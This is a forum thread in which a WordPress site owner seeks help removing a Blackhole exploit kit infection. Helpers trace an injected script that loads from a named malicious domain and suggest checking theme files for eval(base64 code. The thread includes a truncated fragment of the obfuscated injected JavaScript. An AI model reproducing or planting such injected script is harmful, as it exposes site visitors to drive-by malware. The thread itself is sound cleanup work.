here is the results from AVG
The black hole exploits seems to be pretty active, but not the Javascript malware.
Thanks kmessinger, I’ve already checked them out. NOTHING says how to find blackhole exploits, that’s all I want to know. Then I can use your links for to clean the site.
Hi DSW,
I have an intrest in your case, can you please send me a link to your pages ( specifically one which were reported as malicious)
Can you please let me know how did users know they were attacked by blackhole?
thanks,
gadi
Hello gadi.AV, lost my previous account which I posted this topic with. So I’m using this one instead.
Must say that I’m thankful for your interest in helping me!
The problems when users got blocked or warned about my site started about 3 weeks ago, so I took the case in another forum. After some the black hole exploit kit doesn’t show all the time (attacking pcs) so did they recomend me to remove the category page, where they found suspected javascript.
</div></div> </aside> <!–End Sidebar–> </div> <!–End Container–>
<script type=”text/javascript”>if(‘PRgB’==’WIXmQj’)eHKuj=’ESlJVV’;if(‘KyvNR’==’SETEu’)fmxLG();var zSLLL=256;if(‘Achu’==’sMjaGB’)XiGL=’ZPjAu’;var hv .
So I did remove the category and fixed the treath according to AVG.
The result from AVG can be found here (Link) As you see the Javascript treath hasn’t been reported for 30 days.
What’s remaining though is the Blackhole Exploit Kit, which is still active. And that’s the problem, I have only met the virus once. And it was reported as Trojan, a window with false Antivirus tried to install in my computer. So I’m not really sure what it really is!
Here is a screen shot of Avast reporting iframe as threath.
http://www57.zippyshare.com/i/94628030/7608833/Dirtysoundwaves%20-%20virus.jpg
Also my broswer (Opera) blocks often my site.
here is what 28 other webscanners show – https://www.virustotal.com/url/32cbf5296b07dd220d572de32b4432d464e48075a42fc56a77627995eb2e88a9/analysis/1340703454/
You are apparently the only one who can help me.
Thanks!
I still see a malicious script on the site just before the end inner tag.
The script is called from : Referer: dirtysoundwaves(dot)net/category/house-music/ ( don’t go there)
and calls an exploit kit from minussqlite(dot)biz ( don’t go there 🙂
might be other URLs as well in such an attack.
[ code removed – use pastebin instead ]
A Link to the code snippet which is injected:
http://pastebin.com/i75bwYbF
Hmm, might it’s that script. But I’ve been trying to figure out how to find the script in ”End inner tag”.
Can help you there, I am no wordpress expert.
Look at your theme’s index.php, footer.php and functions.php files. See if there is any strange code at the bottom of the index.php, or at the top of your footer.php file. Or they may have a function that they placed in your functions.php file that is getting called in the footer. Typically it will start out with “eval(base64….”
This is the closest code i found
[Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]
Or this one
[Ditto]
Not sure if it’s right, but I’m really bad at finding harmful codes. All looks the same for me.
I’m actually ready to give admin access joust to get rid of the malware.
So if there is any good hearted ones, please!
The code you have listed above is malicious.
[Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]
Wow, never thought I would find it.
Next step would be to remove the codes, I guess?
Copied whole code, don’t know where to remove
[Code moderated as per the Forum Rules. The maximum number of lines of code that you can post in these forums is ten lines. Please use the pastebin]
